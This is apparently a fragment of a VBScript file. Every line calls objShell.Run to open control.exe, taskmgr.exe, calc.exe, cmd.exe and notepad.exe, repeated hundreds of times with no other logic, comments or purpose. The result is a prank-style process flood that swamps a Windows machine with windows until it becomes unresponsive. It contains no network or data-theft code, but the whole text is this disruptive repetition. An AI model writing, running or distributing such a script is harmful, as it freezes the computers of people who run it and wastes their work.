objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

